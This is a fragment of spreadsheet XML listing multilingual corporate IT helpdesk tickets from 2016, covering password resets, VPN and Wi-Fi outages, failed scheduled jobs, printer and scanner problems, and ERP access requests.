    <t>laufzeitfehler bei hrp (hcm production)</t>
  </si>
  <si>
    <t xml:space="preserve">folgender fehler ist bei der erstellung der zeitnachweise aufgetreten: siehe anhang
alle ferienarbeiter bzw. randstad-mitarbeiter sind nur bis einschlieÃŸlich donnerstag, den 25.08.16 im system.
</t>
  </si>
  <si>
    <t>rayklfcm bjfwckyx</t>
  </si>
  <si>
    <t>users in usa plant code plant_241 northgate are unable to see companyguest network.</t>
  </si>
  <si>
    <t>users in usa plant code plant_241 northgate are unable to see companyguest network. this is on phone as well as laptop.
phone: 724</t>
  </si>
  <si>
    <t xml:space="preserve">dmitazhw kxbifzoh : lock out </t>
  </si>
  <si>
    <t>dmitazhw kxbifzoh : lock out _x000D_
mii system</t>
  </si>
  <si>
    <t>ticket update on inplant_855076</t>
  </si>
  <si>
    <t>we don't able to insert money value in crm's authorization return</t>
  </si>
  <si>
    <t>swnjocmk etpuhnwg</t>
  </si>
  <si>
    <t>unable to connect to vpn.</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_37 issue </t>
  </si>
  <si>
    <t>800
summary:need help gaining access to a query in SID_37. i can get into SID_37, i can get into be analyzer, i can find the query name i am looking for (csr quote count) but when i try to open it i get a error message that reads: a critical programdnty error has occurred. the programdnty will now terminate. i need access this week for training that i have scheduled</t>
  </si>
  <si>
    <t>qnvjhgmc nicvbrzg</t>
  </si>
  <si>
    <t>login help to : hub</t>
  </si>
  <si>
    <t>abyfsqod baezguci</t>
  </si>
  <si>
    <t>please remove security role  z:comp_sales_rep from user matghyuthdw (dthyan matheywtyuews)</t>
  </si>
  <si>
    <t>please remove security role  z:comp_sales_rep from user matghyuthdw (dthyan matheywtyuews). action needs to be taken immediately as it causing a security breach. please assign ticket to sudghhahjkkar reddy.</t>
  </si>
  <si>
    <t>reset the password for btelgpcx nrlfhbmu on erp / production / erp</t>
  </si>
  <si>
    <t>btelgpcx nrlfhbmu</t>
  </si>
  <si>
    <t>HostName_1294 (bia - search_server) : multiple process went down since at 8:23 am et on 08/29.</t>
  </si>
  <si>
    <t>search_serverrfcserver2_x000D_
  search_serverindexserver_x000D_
search_servernameserver_x000D_
trx.erpSID_63_trx0</t>
  </si>
  <si>
    <t>new password not updating in the windows</t>
  </si>
  <si>
    <t>system frozen on startup</t>
  </si>
  <si>
    <t>unable to view hr_tool global view and crm on collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yzugpdco.nsyapewg@gmail.com
hello team,
just to inform that skype is not working from my pc
yzugpdco nsyapewg
director sales, company
europe, 
yzugpdco.nsyapewg@gmail.com&lt;mailto:yzugpdco.nsyapewg@gmail.com&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">hdmi cable to meeting room </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: inxsupmy.zhwmifvx@gmail.com
hello team ,
please arrange the hdmi cable to all the meeting room to connect the projector .since most of the new laptop are hdmi dependent where we are unable to connect via the current cable and we always depend it ,sometime it might be onsite in that case it's very difficult
inxsupmy zhwmifvx
team lead - ssl (sourcing &amp; logistics)
inxsupmy.zhwmifvx@gmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: troxyekl.lzdvgwut@gmail.com
hello,
please usa access to the eu vpn for user xfuqovkd efsdciut (seefgrtybum) and atydjkwl sotmfcga (vvrtgwildj)
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/29/2016 08:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/29/2016 08:20:00</t>
  </si>
  <si>
    <t>unable to open opportunities in crm online</t>
  </si>
  <si>
    <t>unable to open opportunities in crm online. user was able to do it a week back but now its showing access is denied.</t>
  </si>
  <si>
    <t>password reset : password_management_tool password manager.</t>
  </si>
  <si>
    <t>nmftrwvi rchywvmz</t>
  </si>
  <si>
    <t>open order schedule lines_p2016-08-28-22-03-54</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ruchitgrr, hallo frau haug,
leider enthÃ¤lt dieser report nur meine tsk positionen.
entsprechend der beschreibung sollte mein gesamtes verkaufsgebiet ( alle ad?) abgebildet sein
gruÃŸ
anivdcor rbmfhiox
sales manager
sales germany
anivdcor.rbmfhiox@gmail.com
company deutschland gmbh
-----ursprÃ¼ngliche nachricht-----
von: .erp-bo-publications@company.com [mailto:.erp-bo-publications@company.com]
gesendet: montag, 29. august 2016 04:58
an: anivdcor rbmfhiox &lt;anivdcor.rbmfhiox@gmail.com&gt;
betreff: open order schedule lines_p2016-08-28-22-03-54
hello.
this report is your weekly open order schedule lines report.  it lists all scheduled delivery dates for open orders for your customers. 
it is expected that you will use this report to effectively manage your sales territory.
if you have any questions with regard to the report please contact your regional sales operational excellence lead.
how to read this report
all scheduled order items are listed on the report.  the columns with the purple field names show total values for that line on the order, and should not be added together.  these total values will appear on every scheduled line.  in the example below, a line item has a total quantity ordered = 10 pieces and three scheduled deliveries of 1, 2 and 7 pieces.  the report will repeat the total quantity ordered = 10 on every schedule line:
order nbr    item nbr    create date     qty sched     value sched    date sched    unit price    qty order
blue_____    blue____    blue_______     blue_____     blue_______    blue______    blue______    purple___
23456789     20          6/12/2013       1             $5             6/15/2013     $5.00         10
23456789     20          6/12/2013       2             $10            6/22/2013     $5.00         10
23456789     20          6/12/2013       7             $35            6/29/2013     $5.00         10
please do not reply directly to the sender of this mail
</t>
  </si>
  <si>
    <t>outlook inbox updating</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: xfdkwusj.gyklresa@gmail.com
hello
since this morning outlook is "updating" my inbox (see image of message)
[cid:image001.jpg@01d201ff.842dd490]
bad thing it is sucking out my bandwidth and slow my connection;
also - when i went in pasue for lunch it was at 3,6 gb left, after i returned it started again from 3,99 gbâ€¦
xfdkwusj gyklresa
sales manager earthworks european served area - south
xfdkwusj.gyklresa@gmail.com&lt;mailto:xfdkwusj.gyklresa@gmail.com&gt;
please note our new telephone number and company address effective 22.08.2016.
*********************************************
company infrastructure gmbh
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>user wants to log in to infonet</t>
  </si>
  <si>
    <t>no access to netweaver</t>
  </si>
  <si>
    <t>when i try to connect with netweaver these 2 messages appears._x000D_
1 / access way not found._x000D_
2 / this don't treat properties of ''register library''.</t>
  </si>
  <si>
    <t>xqauilby muhkleyg</t>
  </si>
  <si>
    <t>error code 0x0 when accessing user dashbankrd on mobile app</t>
  </si>
  <si>
    <t>when accessing dashbankrd created for ap management team on mobile app, the above error code is encountered. see attached screenshots.</t>
  </si>
  <si>
    <t>check router wifi (router: sao-pollaurido-mercedes-ap)- site: south_amerirtca - sp - sÃ£o bernardo campo (mercedes benz)</t>
  </si>
  <si>
    <t xml:space="preserve">hi team, please check the router wifi sao-pollaurido-mercedes-ap, the site company -south_amerirtca - sÃ£o pollaurido / sÃ£o bernardo campo. no is possible connect network wifi - companysecure, this network no is visible to users local. if you need connect remotely or has more doubts please, return me.. </t>
  </si>
  <si>
    <t>tgynoqcs uxfyzrma</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 08/29/2016 07:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 08/29/2016 07:30:00</t>
  </si>
  <si>
    <t>password unlock for venkthrysh</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nmtekfrz.tjxzeuqm@gmail.com
hi,
please unlock the password for userid venkthrysh
the laptop is locked due to entering wrong password. </t>
  </si>
  <si>
    <t>nmtekfrz tjxzeuqm</t>
  </si>
  <si>
    <t>wendt wac 745 quattro's 5 &amp; 6 an pc bzw. server anschlieÃŸen</t>
  </si>
  <si>
    <t>bitte die letzten 2 umfangsschleifmaschinen in plant_107 / ce iso g an den computer bzw. an server anschlieÃŸen, damit man sich den usb stick sparen &amp; die programdntyme direkt auf die maschine ziehen kann.</t>
  </si>
  <si>
    <t>printer configuration.</t>
  </si>
  <si>
    <t>962
summary:i want to configure printer to my laptop which is available in t1</t>
  </si>
  <si>
    <t>the tess application on citrix does not work anymore.</t>
  </si>
  <si>
    <t>when i login to kas.company.com and try to start the tess app i receive the error message._x000D_
i have contacted by our designes in scandinavia from the company fortive that they receive the same error message._x000D_
please do the needful</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: scjxobhd.ldypjkmf@gmail.com_x000D_
_x000D_
hello help team,_x000D_
_x000D_
can you pls. open a ticket to be assigned to fÃ¼rth._x000D_
i  need help with excel and hardcopy._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>asking about cost of material of plant_82</t>
  </si>
  <si>
    <t xml:space="preserve">dear it team
i have sent ticket to -erp-fico as below since last friday but i have not received ticket number yet till now. please  advise.
best </t>
  </si>
  <si>
    <t>unable to change my telephony_software password - it has not yet expired (expires in 4 days)</t>
  </si>
  <si>
    <t>please change my telephony_software interaction desktop password. i get a message that the request to change password has failed (pls see the attached screenshot)</t>
  </si>
  <si>
    <t>following up</t>
  </si>
  <si>
    <t xml:space="preserve">hello it,_x000D_
_x000D_
please can you block this email address in company email server.? _x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>pzybmcqd fxtemlyg</t>
  </si>
  <si>
    <t>connectivity issue at company carrier location</t>
  </si>
  <si>
    <t xml:space="preserve">fya._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 08/29/2016 05:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 08/29/2016 05:20:00</t>
  </si>
  <si>
    <t>reset passwords for cesgrtar abgrtyreu using password_management_tool password reset.</t>
  </si>
  <si>
    <t>telefon-display</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pnroqajb.psbyfhkg@gmail.com_x000D_
_x000D_
hallo helpteam,_x000D_
_x000D_
das display meines telefons ist teilweise unsichtbar und somit ganz schlecht abzulesen._x000D_
_x000D_
vielen dank!_x000D_
_x000D_
viele grÃ¼ÃŸe / best </t>
  </si>
  <si>
    <t xml:space="preserve">business_client issue </t>
  </si>
  <si>
    <t>:+49
summary:need netweaver to check drawing documents. when opening follwing error message " microsoft.net framdntyework 4.5 not installed. please contact administrator"</t>
  </si>
  <si>
    <t>phone is not connoected wit caas server.</t>
  </si>
  <si>
    <t xml:space="preserve">hello;
i can't pick up the pone, this is the error message.
could you help me please?.
id 31751
best </t>
  </si>
  <si>
    <t>ualvjicz vtywmapl</t>
  </si>
  <si>
    <t>delievery item category determination</t>
  </si>
  <si>
    <t>delievery item category determination for rl -0001 has to be assigned.</t>
  </si>
  <si>
    <t>access to common mail box</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pradtheypxsuqgidj.txlpcqsg@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am the owner of the following common mail box;_x000D_
_x000D_
1.       -knowledge.center@kenametal.com&lt;mailto:-knowledge.center@kenametal.com&gt;_x000D_
_x000D_
2.       w-in-knowledge.center@company.com&lt;mailto:w-in-knowledge.center@company.com&gt;_x000D_
_x000D_
my concern today is that i am able to view w-in-knowledge.center@company.com&lt;mailto:w-in-knowledge.center@company.com&gt; but unable to view -knowledge.center@company.com&lt;mailto:-knowledge.center@company.com&gt;_x000D_
pl see below the screenshot. request, pl resolve the same._x000D_
_x000D_
[cid:image001.jpg@01d201fe.b2f53120]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>dgmpqzev aucvxzyp</t>
  </si>
  <si>
    <t>kurtyar khty</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
please reset the password and send the new password to his manager mr. sbfhydeep kurtyar  &lt;nrbgctwm.kfwdhrmt@gmail.com&gt;
emp no
name
useid
manager
20293560
saoltrmy xyuscbkn
kurtyar khty
nrbgctwm kfwdhrmt
with </t>
  </si>
  <si>
    <t>vvrttraja</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
mr. aetwpiox eijzadco is unable to login ess portal. please reset the password and send the new password to his manager mr. shynhjundar s  &lt;tauogwvl.xfvqakdw@gmail.com&gt;
emp no
name
useid
manager
202856785
aetwpiox eijzadco
vvttraja
shynhjundar s
with </t>
  </si>
  <si>
    <t>vpn router : company-eu-deu-germany-dmvpn-1811-rtr02  down</t>
  </si>
  <si>
    <t>vpn router : company-eu-deu-germany-dmvpn-1811-rtr02  down_x000D_
erp is working ok_x000D_
everything else is very slow.</t>
  </si>
  <si>
    <t>urgent shipping issue.</t>
  </si>
  <si>
    <t xml:space="preserve">hello wohtyugang and ethryju. we have a critical situation with shipping on distributor_tool. this customer has complained before and i researched but couldn't determine a problem. we had another customer, bill north, with atnh call for 2nd time yesterday. they are saying when they choose the nda shipping the orders are changing to ups ground. i thought originally they might be setting the carrier and then selecting the ship to but as you can see if the screenshot this is not the case.
i will continue to uacyltoe hxgaycze and try to determine the problem but i wanted to get this reported as quickly as possible.
</t>
  </si>
  <si>
    <t>complaint  7611183254     /  workfflow</t>
  </si>
  <si>
    <t>i create a complaint  7611183254_x000D_
the complaint ist not in the workflow   to approval_x000D_
please help me</t>
  </si>
  <si>
    <t>cdbhoxir vlpkithu</t>
  </si>
  <si>
    <t>anmeldeaccount "mp_ek"  am pc "empw8111328a:--12/13 einrichten . bei rÃ¼ckfragen durchwahl 134 bei lqjoagzt gqueiatx .</t>
  </si>
  <si>
    <t>am oben genannten pc muss der anmeldename "mp_ek" freigegeben werden. wie mit crishtyutian pryes besprochen.</t>
  </si>
  <si>
    <t>lzcvymbn lqnaykvo</t>
  </si>
  <si>
    <t>monitor tauschen \htvepyua izgulrcf</t>
  </si>
  <si>
    <t>customer name "hronovsky" does not listed in engineering tool. erp id - 8561028063.</t>
  </si>
  <si>
    <t xml:space="preserve">name:rekmqxfn jctgwmyi
language:
browser:microsoft internet explorer
email:rekmqxfn.jctgwmyi@gmail.com
customer number:
telephone:0042
summary:customer name "hronovsky" does not listed in engineering tool. erp id - 8561028063.
please check and add this customer.
</t>
  </si>
  <si>
    <t>rekmqxfn jctgwmyi</t>
  </si>
  <si>
    <t>netzwerk fÃ¼r scan nicht verfÃ¼gbar, bitte prÃ¼fen we10 und we111 \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>zeitwirtschaft germany</t>
  </si>
  <si>
    <t xml:space="preserve">seit 25.08.2016, 6.00 uhr morgens, sind fÃ¼r werk germany keine zeitbuchungen vorhanden. bitte den fehler beheben. dringend !!!!!_x000D_
_x000D_
hello,_x000D_
_x000D_
the reason of this ticket is that for germany plant (and also for germany plants)_x000D_
we do not get any time â€“ account data from EU_tool transferred to erp hrp._x000D_
the problem exists since aug 25!!!_x000D_
_x000D_
it has nothing to do with today`s network problems at germany._x000D_
_x000D_
this is serious because of month end closing on thursday._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>probleme mit we_wu123 \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>probleme mit kiosk\ompeztak ilkpqtjh \bur am orde</t>
  </si>
  <si>
    <t>sql installation</t>
  </si>
  <si>
    <t>sql software installation</t>
  </si>
  <si>
    <t>lynrwzfj fvijyeta</t>
  </si>
  <si>
    <t xml:space="preserve">we 108 scannt nicht mehr </t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,_x000D_
_x000D_
unser drucker we 108 scannt nicht mehr richtig ein. es kommt immer die meldung  â€žauftrag wurde nicht abgeschlossen". wenn man dann auf detail geht steht dort â€žanmelde fehler". kannst du das bitte mal Ã¼berprÃ¼fen?_x000D_
am freitag ging es noch, samstag trat dann dieser fehler auf._x000D_
</t>
  </si>
  <si>
    <t>whykbjdq gfqlnysm</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000D_
_x000D_
enter user id of user having the issue:rethtyuzkd_x000D_
_x000D_
transaction code(s) the user needs or was working with: fb01_x000D_
_x000D_
describe the issue:_x000D_
please remove_x000D_
fi:gl_accountant_ch_x000D_
fi:gl_accountant_we_x000D_
as per voprdmae ivrgdmao and ltnivuhw zbudwnfr user should not be able to post accounting documents. _x000D_
 _x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: htburown.hpkfjqyr@gmail.com_x000D_
_x000D_
hai ,_x000D_
_x000D_
can you reset my passwords for all logins,_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>HostName_895 is down since 03:04 am et on 08/29.</t>
  </si>
  <si>
    <t>HostName_895 is down since 03:04 am et on 08/29.
the server is rebooted at 3am daily but for today after reboot the server is still down.
srirgrtyam has been informed.</t>
  </si>
  <si>
    <t>help to create delivery for sto 4908050542</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
would you pls help to create delivery note for sto 5019161653,it's urgent for plant_305,for something error we unable to create, </t>
  </si>
  <si>
    <t>cannot login</t>
  </si>
  <si>
    <t>good morning,
we cannot login to SID_1 due the following error: 
"logon balancing error 88: could not connect to message server: (rc=9)
do you want to see detailed error information?"
can you please check and let me know?
he error exists at least for fleisrgtyk and me (leibdrty)</t>
  </si>
  <si>
    <t>user account is being locked again - zhrgtangs7</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kbclinop.vsczklfp@gmail.com
hi,
user id : zhrgtangs7 account is being locked again when the computer went into screensaver.
</t>
  </si>
  <si>
    <t>engineering_tool installation issue for distribuators</t>
  </si>
  <si>
    <t xml:space="preserve">detailed description of the problem including shopfloor machine name?_x000D_
_x000D_
sogo / engineering_tool [or other app using vlan50] location?_x000D_
_x000D_
source ip from traffic generated?_x000D_
_x000D_
destination ip?_x000D_
_x000D_
type of application (eg: rdp / ping / teamviewer)?_x000D_
_x000D_
any specific port traffic alone been blocked?_x000D_
_x000D_
when did it work last?_x000D_
_x000D_
is the issue specific to only the location mention or for other sogo / engineering_tool location?_x000D_
_x000D_
additionally attach the screenshot of the ping / tracert traffic._x000D_
</t>
  </si>
  <si>
    <t>rsgqbuln pevsanuf</t>
  </si>
  <si>
    <t>problem beim skannen von unterlagen</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jctnelqs.lansuiwe@gmail.com
verehrte damen und herren,
aktuell funktioniert das einskannen von unterlagen nicht. (â€¦.kein zugriff)
drucker                mp72
pc â€“ nr.               empw8111312
bitte um abhilfe.
mit freundlichem gruÃŸ
jctnelqs lansuiwe
quality assurance
jctnelqs.lansuiwe@gmail.com&lt;mailto:jctnelqs.lansuiwe@gmail.com&gt;
persÃ¶nlich haftende gesellschafterin: company gmbh
sitz der gesellschaft: fÃ¼rth - registergerirtcht: fÃ¼rth hrb 10257
</t>
  </si>
  <si>
    <t>ms office 2016 installation wird nicht abgeschlossen, siehe anhang! tel.: 107</t>
  </si>
  <si>
    <t>office installation wird nicht abgeschlossen!</t>
  </si>
  <si>
    <t>tr: rappel: vous avez un nouveau message ! **** spam ****</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hupnceij.hyozjakb@gmail.com_x000D_
_x000D_
hello all,_x000D_
it's a spam, i do not have any account in ingdirect, and if i would have one, wouldn't related to my company email_x000D_
_x000D_
sincÃ¨res salutations, best </t>
  </si>
  <si>
    <t>scannen funktioniert nicht</t>
  </si>
  <si>
    <t>scannen auf publik beim drucker mp60 funktioniert nicht.</t>
  </si>
  <si>
    <t>nzpgwjsa perajnvh</t>
  </si>
  <si>
    <t>zlgmctws khfjzyto donÂ´t have access to her computer / she has forgotten her password, could you please help us?</t>
  </si>
  <si>
    <t>erp password locked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gnasmtvx.cwxtsvkm@gmail.com_x000D_
_x000D_
hi._x000D_
_x000D_
please unblock the erp password._x000D_
_x000D_
userid: hegdthy (gnasmtvx cwxtsvkm)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>scanner im werk germany steel funktionieren nicht!</t>
  </si>
  <si>
    <t>for your information: ngprt29, the printer name</t>
  </si>
  <si>
    <t>azmbnwgp qbrucnpm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 08/29/2016 02:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 08/29/2016 02:14:00</t>
  </si>
  <si>
    <t>laptop key bankrd not working</t>
  </si>
  <si>
    <t xml:space="preserve">please do the needful.
for company
athjyul dixhtyuit , 
m +91 
from: athjyul dixhtyuit 
sent: saturday, july 30, 2016 1:14 pm
to: 'help@company.com' &lt;help@company.com&gt;
subject: laptop key bankrd not working
my laptop key bankrd not working . please depute dell person to attend the problem. 
laptop model is latitude 7350.
asset code is 801302
service tag-dcgw262
for company
athjyul dixhtyuit       
senior manager sales - north ( msg)
qubywmgf.jouickqx@gmail.com
companytm
</t>
  </si>
  <si>
    <t>not able to print on id02</t>
  </si>
  <si>
    <t>scannen vom scanner vh48 geht nicht mit dem hinweise: laufwerk nicht bekannt!</t>
  </si>
  <si>
    <t>our printer rn33 at plant_223 doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
our printer rn33 at plant_223 for production papers doesn't work._x000D_
 we need it support a.s.a.p._x000D_
</t>
  </si>
  <si>
    <t>beim scannen von auftrÃ¤gen kommt die meldung das der pfad nicht existiert</t>
  </si>
  <si>
    <t>nx is not opening through extr but nx power drafting is opening</t>
  </si>
  <si>
    <t>name:megfgthyhana
language:
browser:microsoft internet explorer
email:pkzthgea.kgvsdmpj@gmail.com
customer number:
telephone:073
summary:nx is not opening through extr but nx power drafting is opening</t>
  </si>
  <si>
    <t>pkzthgea kgvsdmpj</t>
  </si>
  <si>
    <t>erp login error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rmezbnqt.ntbmkpuh@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
                i am unable to login to erp please do the needful._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d201e2.2bb514d0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>account information updated</t>
  </si>
  <si>
    <t xml:space="preserve">hi, _x000D_
_x000D_
could you please confirm whether this is a genuine mail??_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wi fi connectivity issues</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dshferby.houtnzdi@gmail.com
dear team,
good morning.
we observe lot of wi fi connectivity issues in kirgtyan training room ( pu6 ground floor), taranga ( pu6, i floor), pu5 i floor office area, emerald conference room (admin i floor).
kind request you to look into that.
</t>
  </si>
  <si>
    <t xml:space="preserve">telecom_vendor_2 card is not working </t>
  </si>
  <si>
    <t>lorszemd waotbgrv</t>
  </si>
  <si>
    <t>power is not working</t>
  </si>
  <si>
    <t>computer wont turn on _x000D_
power is not working</t>
  </si>
  <si>
    <t>asthifne baehplqt</t>
  </si>
  <si>
    <t>request to reset microsoft online services password</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: monday, august 29, 2016 9:07 am
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: rad:request to reset microsoft online services password for tgynoqcs.uxfyzrma@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ tgynoqcs.uxfyzrma@gmail.com 
â€¢ first name: nehtjuavathi 
â€¢ last name: patirjy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</si>
  <si>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 xml:space="preserve">from: hzudxyqb qsmrwvle _x000D_
sent: monday, august 29, 2016 8:38 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:fw: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000D_
importance: high_x000D_
_x000D_
please restore my mobile settings to enable access emails on mobile._x000D_
_x000D_
thanking you,_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>hzudxyqb qsmrwvle</t>
  </si>
  <si>
    <t>name:vivian kurtyar 
language:
browser:microsoft internet explorer
email:jecigpzw.gqpmxwal@gmail.com
customer number:
telephone:
summary:outlook not working</t>
  </si>
  <si>
    <t>jecigpzw gqpmxwal</t>
  </si>
  <si>
    <t xml:space="preserve">erp not working </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: irqpwgtn.dpautgeh@gmail.com_x000D_
_x000D_
dear sir,_x000D_
following message is coming while clicking erp icon:_x000D_
_x000D_
emp code: 2027646758_x000D_
user id: schyhty_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d20129.ebbd62f0]_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>error while changing password in password_management_tool password manager (error msg is attached)</t>
  </si>
  <si>
    <t>error while changing password in password_management_tool password manager. please see attached snapshot &amp; do the needful.</t>
  </si>
  <si>
    <t>please help to unlock pw for user: zhrgtangs7</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kbclinop.vsczklfp@gmail.com_x000D_
_x000D_
hi,_x000D_
we tried to unlock from password_management_tool site but failed.   please help to unlock for user : zhrgtangs7._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 08/28/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 08/28/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 08/28/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 08/28/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 08/28/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 08/28/2016 23:00:00</t>
  </si>
  <si>
    <t>tqaevrng hpocnrvj</t>
  </si>
  <si>
    <t>not able to login attendance_tool</t>
  </si>
  <si>
    <t xml:space="preserve">i am not able to login attendance_tool application. my user id is 210516 </t>
  </si>
  <si>
    <t>cgvhxjay znyuopqk</t>
  </si>
  <si>
    <t>apac china pbx/telephony_software system issue</t>
  </si>
  <si>
    <t xml:space="preserve">apac china&amp; dc have ip phone issue, one e1 lineï¼ˆphone number range 2062xxxxï¼‰ can't dial out exterior lineï¼Œif you dial out exterior line, we always received busy tone, but we can dial in. i called pbx vendor(siemens) engineer &amp; isp to check their devices, the feedback is all devices working fine. so they let us to check our audiocodes devices, cause all line connect to audiocodes. please contact related person to contact me &amp; help me solve the problem. </t>
  </si>
  <si>
    <t>ç”µè„‘å¯†ç åŒæ­¥é—®é¢˜</t>
  </si>
  <si>
    <t xml:space="preserve">hi gartryhu,_x000D_
_x000D_
æˆ‘çŽ°åœ¨ç”µè„‘æœ‰å‡ ä¸ªé—®é¢˜ï¼Œèƒ½å¦è¿œç¨‹è¿žæŽ¥åŽå¸®æˆ‘å¤„ç†ä¸€ä¸‹ã€‚_x000D_
_x000D_
æœ€è¿‘æ›´æ”¹å¯†ç å¹¶è¯•å›¾åŒæ­¥åŽï¼ŒåŒæ­¥æ²¡å®Œæˆï¼Œå¼€æœºå¯†ç ä¸Žé‚®ä»¶å¯†ç ä¸ç»Ÿä¸€ï¼Œä¸”ä¸èƒ½ä½¿ç”¨è‚¯çº³è´­ç‰©ç½‘ï¼Œæœ€ä¸¥é‡çš„æ˜¯ï¼ŒvpnçŽ°åœ¨è¿žä¸ä¸Šäº†ï¼Œæç¤ºæ˜¯å¯†ç é”™è¯¯ï¼Œå¯æˆ‘æ— è®ºè¾“å…¥åŽŸæ¥çš„å¯†ç æˆ–æ›´æ”¹åŽçš„å¯†ç ï¼Œéƒ½ä¸èƒ½è¿žæŽ¥ï¼Œèƒ½å¸®å¿™è§£å†³ä¸€ä¸‹å—ï¼Ÿ_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>pqaoenuv dqythubf</t>
  </si>
  <si>
    <t>shipping notice</t>
  </si>
  <si>
    <t xml:space="preserve">from: north service 
sent: monday, august 29, 2016 7:42 am
to: nwfodmhc exurcwkm
cc: hrlwizav elyamqro
subject: rad:shipping notice
hello,guys
pls kindly set shipping notice under plant_283 for below customer to hrlwizav.elyamqro@gmail.com
81507257
70443464
81857752
</t>
  </si>
  <si>
    <t>skype could not work</t>
  </si>
  <si>
    <t>skype could not work ï¼Œcan not hear anything</t>
  </si>
  <si>
    <t>qpysibeo zpekrnbu</t>
  </si>
  <si>
    <t>laptop slowness issue</t>
  </si>
  <si>
    <t xml:space="preserve">laptop slowness while using multiple apps at a time. </t>
  </si>
  <si>
    <t>wgq dcæ‰€æœ‰ç”µè¯æ— æ³•æ‹¨é€šå¤–çº¿</t>
  </si>
  <si>
    <t>wgq dcæ‰€æœ‰ç”µè¯æ— æ³•æ‹¨é€šå¤–çº¿ã€‚</t>
  </si>
  <si>
    <t>wireless outage again-taiwan 0829</t>
  </si>
  <si>
    <t xml:space="preserve"> request to reset microsoft online services password for nhjpxoct.ewngozhx@gmail.com</t>
  </si>
  <si>
    <t>nhjpxoct ewngozhx</t>
